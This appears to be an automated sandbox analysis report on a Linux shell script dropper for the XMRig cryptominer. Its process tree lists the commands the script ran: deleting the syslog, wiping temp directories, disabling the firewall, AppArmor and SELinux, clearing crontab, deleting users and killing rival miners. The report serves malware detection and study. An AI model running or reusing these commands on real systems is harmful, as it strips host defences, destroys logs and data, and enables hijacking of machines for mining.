Analysis
max time kernel: 149s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 09-09-2024 17:01

Static task: static1
Behavioral task: behavioral1
Sample: a.sh
Resource: ubuntu1804-amd64-20240611-en

General
Target: a.sh
Size: 6KB
MD5: e97dee2d99e3bd5150abdfb488aafeb8
SHA1: 8a9b089a194b383b2202457afa1e0b3ec8fc4d3f
SHA256: f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b
SHA512: 1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25
SSDEEP: 192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//
Malware Config
Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.

Deletes system logs (1 TTPs, 1 IoCs)
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
  description: File deleted | ioc: /var/log/syslog | process: rm

Flushes firewall rules (3 IoCs)
Flushes/disables firewall rules inside the Linux kernel.
Processes:
  pid   process
  1553  ufw
  1725  iptables
  1881  update-rc.d

Loads a kernel module
Processes:
  ioc: /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko | pid: 1557 | process: modprobe

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.

Disables AppArmor (28 IoCs)
Disables AppArmor security module.
Processes:
  process: systemctl (all 28 entries)
  pids: 1895, 1880, 1889, 1889, 1860, 1889, 1889, 1860, 1880, 1885, 1885, 1885, 1897, 1905, 1860, 1860, 1873, 1880, 1880, 1885, 1889, 1860, 1860, 1880, 1885, 1889, 1880, 1885

Disables SELinux (1 IoCs)
Disables SELinux security module.
Processes:
  pid   process
  1859  setenforce

Enumerates running processes
Discovers information about currently running processes on the system.

Changes its process name (1 IoCs)
Processes:
  description: Changes the process name, possibly in an attempt to hide itself | ioc: (sysv-install) | pid: 1877

Reads CPU attributes (1 TTPs, 14 IoCs)
Processes:
  description: File opened for reading | ioc: /sys/devices/system/cpu/online
  process (14 entries): pkill, ps, pkill, pgrep, pgrep, pkill, pkill, pkill, ps, pgrep, pgrep, pkill, ps, pgrep

Enumerates kernel/hardware configuration (1 TTPs, 2 IoCs)
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
  description: File opened for reading | ioc: /sys/module/ip6_tables/initstate | process: modprobe
  description: File opened for reading | ioc: /sys/module/x_tables/initstate | process: modprobe

Reads runtime system information
Processes (files opened for reading under /proc by killall, ps, pgrep, pkill and awk):
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
  description: File opened for modification | ioc: /tmp/log_rot | process: a.sh
Processes
Each entry is "[depth] image: command line (PID) {signatures}".
- [1] /tmp/a.sh: /tmp/a.sh (PID 1510) {Writes file to tmp directory}
  - [2] /bin/grep: grep -v grep (PID 1516)
  - [2] /bin/grep: grep .docker (PID 1515)
  - [2] /bin/ps: ps aux (PID 1514) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/sudo: sudo -n true (PID 1517) {Abuse Elevation Control Mechanism: Sudo and Sudo Caching}
  - [2] /bin/rm: rm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba (PID 1519)
  - [2] /bin/rm: rm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI (PID 1520)
  - [2] /bin/rm: rm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix (PID 1521)
  - [2] /bin/rm: rm -rf /var/tmp/. /var/tmp/.. (PID 1522)
  - [2] /bin/rm: rm -rf /root/.docker.json (PID 1523)
  - [2] /bin/rm: rm -rf /root/.xmrig.json (PID 1524)
  - [2] /bin/rm: rm -rf /root/.config/docker.json (PID 1525)
  - [2] /bin/rm: rm -rf /root/.config/xmrig.json (PID 1526)
  - [2] /usr/bin/pgrep: pgrep kdevtmp (PID 1528) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pgrep: pgrep kthreaddk (PID 1529) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pgrep: pgrep kinsing (PID 1530) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pgrep: pgrep solrd (PID 1531) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pgrep: pgrep sidekiq (PID 1532) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pkill: pkill -f kthreaddi (PID 1536) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pkill: pkill -f kdevtmpfsi (PID 1537) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pkill: pkill -f xmrig (PID 1538) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pkill: pkill -f kinsing (PID 1539) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/pkill: pkill -f systemdd-dev (PID 1540) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 .dockerd (PID 1541) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 .docker (PID 1542) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 xmrig (PID 1543) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 kthreaddi (PID 1544) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 kdevtmpfsi (PID 1545)
  - [2] /usr/bin/killall: killall -9 kinsing (PID 1546) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 ssrr (PID 1547) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 .dockerd (PID 1548) {Reads runtime system information}
  - [2] /usr/bin/killall: killall -9 .docker (PID 1549)
  - [2] /usr/bin/killall: killall /bin/bash /var/tmp/.dockerd (PID 1550)
  - [2] /usr/bin/killall: killall /bin/bash /.docker (PID 1551)
  - [2] /bin/rm: rm -rf /var/log/syslog (PID 1552) {Deletes system logs}
  - [2] /usr/sbin/ufw: ufw disable (PID 1553) {Flushes firewall rules}
    - [3] /sbin/iptables: /sbin/iptables -V (PID 1554)
    - [3] /lib/ufw/ufw-init: /lib/ufw/ufw-init force-stop (PID 1555)
      - [4] /sbin/ip6tables: ip6tables -L INPUT -n (PID 1556)
        - [5] /sbin/modprobe: /sbin/modprobe ip6_tables (PID 1557) {Loads a kernel module; Enumerates kernel/hardware configuration}
      - [4] /sbin/iptables: iptables -F ufw-logging-deny (PID 1561)
      - [4] /sbin/iptables: iptables -F ufw-logging-allow (PID 1564)
      - [4] /sbin/iptables: iptables -F ufw-not-local (PID 1565)
      - [4] /sbin/iptables: iptables -F ufw-user-logging-input (PID 1566)
      - [4] /sbin/iptables: iptables -F ufw-user-limit-accept (PID 1567)
      - [4] /sbin/iptables: iptables -F ufw-user-limit (PID 1568)
      - [4] /sbin/iptables: iptables -F ufw-skip-to-policy-input (PID 1569)
      - [4] /sbin/iptables: iptables -F ufw-reject-input (PID 1570)
      - [4] /sbin/iptables: iptables -F ufw-after-logging-input (PID 1571)
      - [4] /sbin/iptables: iptables -F ufw-after-input (PID 1572)
      - [4] /sbin/iptables: iptables -F ufw-user-input (PID 1573)
      - [4] /sbin/iptables: iptables -F ufw-before-input (PID 1574)
      - [4] /sbin/iptables: iptables -F ufw-before-logging-input (PID 1575)
      - [4] /sbin/iptables: iptables -F ufw-skip-to-policy-forward (PID 1576)
      - [4] /sbin/iptables: iptables -F ufw-reject-forward (PID 1577)
      - [4] /sbin/iptables: iptables -F ufw-after-logging-forward (PID 1578)
      - [4] /sbin/iptables: iptables -F ufw-after-forward (PID 1579)
      - [4] /sbin/iptables: iptables -F ufw-user-logging-forward (PID 1580)
      - [4] /sbin/iptables: iptables -F ufw-user-forward (PID 1581)
      - [4] /sbin/iptables: iptables -F ufw-before-forward (PID 1582)
      - [4] /sbin/iptables: iptables -F ufw-before-logging-forward (PID 1583)
      - [4] /sbin/iptables: iptables -F ufw-track-forward (PID 1584)
      - [4] /sbin/iptables: iptables -F ufw-track-output (PID 1585)
      - [4] /sbin/iptables: iptables -F ufw-track-input (PID 1586)
      - [4] /sbin/iptables: iptables -F ufw-skip-to-policy-output (PID 1587)
      - [4] /sbin/iptables: iptables -F ufw-reject-output (PID 1588)
      - [4] /sbin/iptables: iptables -F ufw-after-logging-output (PID 1589)
      - [4] /sbin/iptables: iptables -F ufw-after-output (PID 1590)
      - [4] /sbin/iptables: iptables -F ufw-user-logging-output (PID 1591)
      - [4] /sbin/iptables: iptables -F ufw-user-output (PID 1592)
      - [4] /sbin/iptables: iptables -F ufw-before-output (PID 1593)
      - [4] /sbin/iptables: iptables -F ufw-before-logging-output (PID 1594)
      - [4] /sbin/iptables: iptables -Z ufw-logging-deny (PID 1595)
      - [4] /sbin/iptables: iptables -Z ufw-logging-allow (PID 1596)
      - [4] /sbin/iptables: iptables -Z ufw-not-local (PID 1597)
      - [4] /sbin/iptables: iptables -Z ufw-user-logging-input (PID 1598)
      - [4] /sbin/iptables: iptables -Z ufw-user-limit-accept (PID 1599)
      - [4] /sbin/iptables: iptables -Z ufw-user-limit (PID 1600)
      - [4] /sbin/iptables: iptables -Z ufw-skip-to-policy-input (PID 1601)
      - [4] /sbin/iptables: iptables -Z ufw-reject-input (PID 1602)
      - [4] /sbin/iptables: iptables -Z ufw-after-logging-input (PID 1603)
      - [4] /sbin/iptables: iptables -Z ufw-after-input (PID 1604)
      - [4] /sbin/iptables: iptables -Z ufw-user-input (PID 1605)
      - [4] /sbin/iptables: iptables -Z ufw-before-input (PID 1606)
      - [4] /sbin/iptables: iptables -Z ufw-before-logging-input (PID 1607)
      - [4] /sbin/iptables: iptables -Z ufw-skip-to-policy-forward (PID 1608)
      - [4] /sbin/iptables: iptables -Z ufw-reject-forward (PID 1609)
      - [4] /sbin/iptables: iptables -Z ufw-after-logging-forward (PID 1610)
      - [4] /sbin/iptables: iptables -Z ufw-after-forward (PID 1611)
      - [4] /sbin/iptables: iptables -Z ufw-user-logging-forward (PID 1612)
      - [4] /sbin/iptables: iptables -Z ufw-user-forward (PID 1613)
      - [4] /sbin/iptables: iptables -Z ufw-before-forward (PID 1614)
      - [4] /sbin/iptables: iptables -Z ufw-before-logging-forward (PID 1615)
      - [4] /sbin/iptables: iptables -Z ufw-track-forward (PID 1616)
      - [4] /sbin/iptables: iptables -Z ufw-track-output (PID 1617)
      - [4] /sbin/iptables: iptables -Z ufw-track-input (PID 1618)
      - [4] /sbin/iptables: iptables -Z ufw-skip-to-policy-output (PID 1619)
      - [4] /sbin/iptables: iptables -Z ufw-reject-output (PID 1620)
      - [4] /sbin/iptables: iptables -Z ufw-after-logging-output (PID 1621)
      - [4] /sbin/iptables: iptables -Z ufw-after-output (PID 1622)
      - [4] /sbin/iptables: iptables -Z ufw-user-logging-output (PID 1623)
      - [4] /sbin/iptables: iptables -Z ufw-user-output (PID 1624)
      - [4] /sbin/iptables: iptables -Z ufw-before-output (PID 1625)
      - [4] /sbin/iptables: iptables -Z ufw-before-logging-output (PID 1626)
      - [4] /sbin/iptables: iptables -X ufw-logging-deny (PID 1627)
      - [4] /sbin/iptables: iptables -X ufw-logging-allow (PID 1628)
      - [4] /sbin/iptables: iptables -X ufw-not-local (PID 1629)
      - [4] /sbin/iptables: iptables -X ufw-user-logging-input (PID 1630)
      - [4] /sbin/iptables: iptables -X ufw-user-logging-output (PID 1631)
      - [4] /sbin/iptables: iptables -X ufw-user-logging-forward (PID 1632)
      - [4] /sbin/iptables: iptables -X ufw-user-limit-accept (PID 1633)
      - [4] /sbin/iptables: iptables -X ufw-user-limit (PID 1634)
      - [4] /sbin/iptables: iptables -X ufw-user-input (PID 1635)
      - [4] /sbin/iptables: iptables -X ufw-user-forward (PID 1636)
      - [4] /sbin/iptables: iptables -X ufw-user-output (PID 1637)
      - [4] /sbin/iptables: iptables -X ufw-skip-to-policy-input (PID 1638)
      - [4] /sbin/iptables: iptables -X ufw-skip-to-policy-output (PID 1639)
      - [4] /sbin/iptables: iptables -X ufw-skip-to-policy-forward (PID 1640)
      - [4] /sbin/iptables: iptables -P INPUT ACCEPT (PID 1641)
      - [4] /sbin/iptables: iptables -P OUTPUT ACCEPT (PID 1642)
      - [4] /sbin/iptables: iptables -P FORWARD ACCEPT (PID 1643)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-logging-deny (PID 1644)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-logging-allow (PID 1645)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-not-local (PID 1646)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-logging-input (PID 1647)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-limit-accept (PID 1648)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-limit (PID 1649)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-input (PID 1650)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-reject-input (PID 1651)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-logging-input (PID 1652)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-input (PID 1653)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-input (PID 1654)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-input (PID 1655)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-logging-input (PID 1656)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-forward (PID 1657)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-reject-forward (PID 1658)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-logging-forward (PID 1659)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-forward (PID 1660)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-logging-forward (PID 1661)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-forward (PID 1662)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-forward (PID 1663)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-logging-forward (PID 1664)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-track-forward (PID 1665)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-track-output (PID 1666)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-track-input (PID 1667)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-output (PID 1668)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-reject-output (PID 1669)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-logging-output (PID 1670)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-after-output (PID 1671)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-logging-output (PID 1672)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-user-output (PID 1673)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-output (PID 1674)
      - [4] /sbin/ip6tables: ip6tables -F ufw6-before-logging-output (PID 1675)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-logging-deny (PID 1676)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-logging-allow (PID 1677)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-not-local (PID 1678)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-input (PID 1679)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-limit-accept (PID 1680)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-limit (PID 1681)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-input (PID 1682)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-reject-input (PID 1683)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-input (PID 1684)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-input (PID 1685)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-input (PID 1686)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-input (PID 1687)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-input (PID 1688)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-forward (PID 1689)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-reject-forward (PID 1690)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-forward (PID 1691)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-forward (PID 1692)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-forward (PID 1693)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-forward (PID 1694)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-forward (PID 1695)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-forward (PID 1696)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-track-forward (PID 1697)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-track-output (PID 1698)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-track-input (PID 1699)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-output (PID 1700)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-reject-output (PID 1701)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-output (PID 1702)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-after-output (PID 1703)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-output (PID 1704)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-user-output (PID 1705)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-output (PID 1706)
      - [4] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-output (PID 1707)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-logging-deny (PID 1708)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-logging-allow (PID 1709)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-not-local (PID 1710)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-logging-input (PID 1711)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-logging-output (PID 1712)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-logging-forward (PID 1713)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-limit-accept (PID 1714)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-limit (PID 1715)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-input (PID 1716)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-forward (PID 1717)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-user-output (PID 1718)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-input (PID 1719)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-output (PID 1720)
      - [4] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-forward (PID 1721)
      - [4] /sbin/ip6tables: ip6tables -P INPUT ACCEPT (PID 1722)
      - [4] /sbin/ip6tables: ip6tables -P OUTPUT ACCEPT (PID 1723)
      - [4] /sbin/ip6tables: ip6tables -P FORWARD ACCEPT (PID 1724)
  - [2] /sbin/iptables: iptables -F (PID 1725) {Flushes firewall rules}
  - [2] /usr/sbin/userdel: userdel akay (PID 1726)
  - [2] /usr/sbin/userdel: userdel vfinder (PID 1730)
  - [2] /bin/grep: grep -i "[a]liyun" (PID 1735)
  - [2] /bin/ps: ps aux (PID 1731) {Reads CPU attributes; Reads runtime system information}
  - [2] /bin/grep: grep -i "[y]unjing" (PID 1737)
  - [2] /bin/ps: ps aux (PID 1736) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/bin/crontab: crontab -r (PID 1738)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1744)
  - [2] /bin/grep: grep -v - (PID 1743)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1742)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1741)
  - [2] /bin/grep: grep :143 (PID 1740)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1750)
  - [2] /bin/grep: grep -v - (PID 1749)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1748)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1747)
  - [2] /bin/grep: grep :2222 (PID 1746)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1756)
  - [2] /bin/grep: grep -v - (PID 1755)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1754)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1753)
  - [2] /bin/grep: grep :3333 (PID 1752)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1762)
  - [2] /bin/grep: grep -v - (PID 1761)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1760)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1759)
  - [2] /bin/grep: grep :3389 (PID 1758)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1768)
  - [2] /bin/grep: grep -v - (PID 1767)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1766)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1765)
  - [2] /bin/grep: grep :4444 (PID 1764)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1774)
  - [2] /bin/grep: grep -v - (PID 1773)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1772)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1771) {Reads runtime system information}
  - [2] /bin/grep: grep :5555 (PID 1770)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1780)
  - [2] /bin/grep: grep -v - (PID 1779)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1778)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1777)
  - [2] /bin/grep: grep :6666 (PID 1776)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1786)
  - [2] /bin/grep: grep -v - (PID 1785)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1784)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1783)
  - [2] /bin/grep: grep :6665 (PID 1782)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1792)
  - [2] /bin/grep: grep -v - (PID 1791)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1790)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1789)
  - [2] /bin/grep: grep :6667 (PID 1788)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1798)
  - [2] /bin/grep: grep -v - (PID 1797)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1796)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1795)
  - [2] /bin/grep: grep :7777 (PID 1794)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1804)
  - [2] /bin/grep: grep -v - (PID 1803)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1802)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1801)
  - [2] /bin/grep: grep :8444 (PID 1800)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1810)
  - [2] /bin/grep: grep -v - (PID 1809)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1808)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1807)
  - [2] /bin/grep: grep :3347 (PID 1806)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1816)
  - [2] /bin/grep: grep -v - (PID 1815)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1814)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1813)
  - [2] /bin/grep: grep :14444 (PID 1812)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1822)
  - [2] /bin/grep: grep -v - (PID 1821)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1820)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1819)
  - [2] /bin/grep: grep :14433 (PID 1818)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1828)
  - [2] /bin/grep: grep -v - (PID 1827)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1826)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1825)
  - [2] /bin/grep: grep :13531 (PID 1824)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1834)
  - [2] /bin/grep: grep -v - (PID 1833)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1832)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1831)
  - [2] /bin/grep: grep :7890 (PID 1830)
  - [2] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID 1840)
  - [2] /bin/grep: grep -v - (PID 1839)
  - [2] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID 1838)
  - [2] /usr/bin/awk: awk "{print \$7}" (PID 1837)
  - [2] /bin/grep: grep :3456 (PID 1836)
  - [2] /bin/systemctl: systemctl stop c3pool_miner.service (PID 1841)
  - [2] /bin/systemctl: systemctl stop skypool_miner.service (PID 1845)
  - [2] /bin/systemctl: systemctl disable c3pool_miner.service (PID 1846)
  - [2] /bin/systemctl: systemctl disable skypool_miner.service (PID 1850)
  - [2] /usr/bin/killall: killall log_rot (PID 1854)
  - [2] /usr/bin/pkill: pkill -f log_rot (PID 1858) {Reads CPU attributes; Reads runtime system information}
  - [2] /usr/sbin/setenforce: setenforce 0 (PID 1859) {Disables SELinux}
  - [2] /usr/sbin/service: service apparmor stop (PID 1860)
    - [3] /usr/bin/basename: basename /usr/sbin/service (PID 1861)
    - [3] /usr/bin/basename: basename /usr/sbin/service (PID 1862)
    - [3] /bin/systemctl: systemctl --quiet is-active multi-user.target (PID 1863)
    - [3] /bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID 1869)
    - [3] /bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID 1868)
  - [2] /usr/local/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /usr/local/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /usr/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /usr/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service (PID 1860) {Disables AppArmor}
  - [2] /bin/systemctl: systemctl disable apparmor (PID 1873) {Disables AppArmor}
    - [3] /lib/systemd/systemd-sysv-install: /lib/systemd/systemd-sysv-install disable apparmor (PID 1877)
      - [4] /usr/bin/getopt: getopt -o r: --long root: -- disable apparmor (PID 1878)
      - [4] /usr/sbin/update-rc.d: /usr/sbin/update-rc.d apparmor defaults (PID 1879)
        - [5] /usr/local/sbin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
        - [5] /usr/local/bin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
        - [5] /usr/sbin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
        - [5] /usr/bin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
        - [5] /sbin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
        - [5] /bin/systemctl: systemctl daemon-reload (PID 1880) {Disables AppArmor}
      - [4] /usr/sbin/update-rc.d: /usr/sbin/update-rc.d apparmor disable (PID 1881) {Flushes firewall rules}
        - [5] /usr/local/sbin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
        - [5] /usr/local/bin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
        - [5] /usr/sbin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
        - [5] /usr/bin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
        - [5] /sbin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
        - [5] /bin/systemctl: systemctl daemon-reload (PID 1885) {Disables AppArmor}
